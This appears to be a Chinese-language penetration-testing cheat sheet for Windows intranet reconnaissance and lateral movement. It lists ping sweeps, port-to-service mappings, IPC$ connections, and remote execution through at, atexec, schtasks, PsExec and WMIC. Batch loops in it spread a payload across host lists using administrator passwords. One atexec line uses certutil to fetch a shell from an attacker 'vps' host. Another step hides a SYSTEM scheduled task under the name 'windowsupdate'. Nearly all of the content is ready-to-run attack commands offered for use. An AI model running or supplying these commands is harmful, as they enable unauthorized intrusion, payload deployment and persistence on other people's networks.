探测存活主机
For+Ping命令查询存活主机>for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.0.%I |findstr "TTL="
查域名对应的ip
For+Ping命令查询域名对应IP>for /f "delims=" %i in (D:/domains.txt) do @ping -w 1 -n 1 %i | findstr /c:"[192." >> c:/windows/temp/ds.txt
内外网资产对应
1.将收集到的子域名保存,使用ping命令在内网循环for /f "delims=" %i in (host.txt) do @ping -w 1 -n 1 %i | findstr /c:"[10." /c:"[192." /c:"[172." >> C:/users/public/out.txt2.找到dns服务器ip,ipconfig或扫描开启53端口的机器https://github.com/Q2h1Cg/dnsbrutednsbrute.exe -domain a.com -dict ziyuming.txt -rate 1000 -retry 1 -server 192.168.1.1:533.扫描内网ip开启web服务的title
常见的端口对应的服务
| 服务 | 端口 |
|---|---|
| Mssql | 1433 |
| SMB | 445 |
| WMI | 135 |
| winrm | 5985 |
| rdp | 3389 |
| ssh | 22 |
| oracle | 1521 |
| mysql | 3306 |
| redis | 6379 |
| postgresql | 5432 |
| ldap | 389 |
| smtp | 25 |
| pop3 | 110 |
| imap | 143 |
| exchange | 443 |
| vnc | 5900 |
| ftp | 21 |
| rsync | 873 |
| mongodb | 27017 |
| telnet | 23 |
| svn | 3690 |
| java rmi | 1099 |
| couchdb | 5984 |
| pcanywhere | 5632 |
| web | 80-90,8000-10000,7001,9200,9300 |
执行命令&IPC&计划任务
建立连接>net use \\192.168.52.20\ipc$ "password" /user:domain\administrator查看连接>net use列文件>dir \\192.168.52.20\c$查看系统时间>net time \\192.168.52.20上传文件>copy 1.exe \\192.168.52.20\c$下载文件>copy \\192.168.52.20\c$\1.exe 1.exe批量IPC@echo offecho check ip addr config file…if not exist ip.txt echo ip addr config file ip.txt does not exist! & goto endecho read and analysis file…for /F "eol=#" %%i in (ip.txt) do start PsExec.exe \\%%i -accepteula -u administrator -p "123456" cmd & start cmd /c PsExec.exe \\%%i -u administrator -p "123456" cmd:endexit
AT
>net use \\192.168.52.20\ipc$ "password" /user:domain\administrator>copy 1.exe \\192.168.52.20\c$>net time \\192.168.52.20>at \\192.168.52.20 1:00AM c:\1.exe>at \\192.168.52.20 1:00AM cmd.exe /c “ipconfig >c:/1.txt”>type \\192.168.52.20\c$\1.txt查看计划任务>at \\192.168.52.20删除计划任务>at \\192.168.52.20 计划ID /delete横向批量上线>atexec.exe ./administrator:pass@192.168.52.20 "certutil.exe -urlcache -split -f http://vps:80/shell.txt c:/windows/debug/SysDug.exe">atexec.exe ./administrator:pass@192.168.52.20"c:/windows/debug/SysDug.exe">atexec.exe ./administrator:pass@192.168.52.20 "certutil.exe -urlcache -split -f c:/windows/debug/SysDug.exe delete"
Schtasks
>net use \\192.168.52.20\ipc$ "password" /user:"domain\administrator">schtasks /query /fo LIST /v 查看计划任务上传文件>copy ok.exe \\192.168.52.20\c$\windows\temp远程创建定时任务>schtasks /create /s "192.168.52.20" /u "admin" /p "qqq23" /RL HIGHEST /F /tn "windowsupdate" /tr "c:\windows\temp\ok.exe" /sc DAILY /mo 1 /ST 20:28 /RU SYSTEM查询远程创建的任务>schtasks /query /s "192.168.52.20" /U "admin" /P "qqq23" | findstr "windowsupdate"立即执行远程任务>schtasks /run /tn windowsupdate /s "192.168.52.20" /U "admin" /P "qqq23"删除定时任务>schtasks /Delete /tn windowsupdate /F /s "192.168.52.20" /u "admin" /p "qqq23"删除IPC>net user name /del /y横向批量上线>for /f %i in (ip.txt) do net use \\%i\admin$ /user:"administrator" "password" & if %errorlevel% equ 0 ( copy ok.exe \\%i\admin$\debug\ /Y ) & wmic /NODE:"%i" /user:"administrator" /password:"password" PROCESS call create "c:\windows\debug\ok.exe" & @ping 127.0.0.1 -n 8 >nul & net use \\%i\admin$ /del
WMIC
>net use \\192.168.52.20\ipc$ "password" /user:"domain\administrator">copy ok.exe \\192.168.52.20\c$\windows\temp>wmic /NODE:" 192.168.52.20" /user:"administrator" /password:"password" PROCESS call create "c:\windows\temp\ok.exe">del \\192.168.52.20\c$\windows\temp\ok.exe /F>net use \\192.168.52.20\c$ /del
快速定位域管理登过的机器
>psexec –accepteula @ips.txt –u admin –p pass@123 –c 1.bat#1.bat内容tasklist /v | find “域管理名字”@echo offecho check ip addr config file…if not exist ip.txt echo ip addr config file ip.txt does not exist! & goto endecho read and analysis file…for /F “eol=#” %%i in (ip.txt) do echo %%i &(echo %%i &tasklist /s %%i /u administrator /p pass@123 /v) >>d:\result.txt:endexit
若有收获,就点个赞吧
0 人点赞
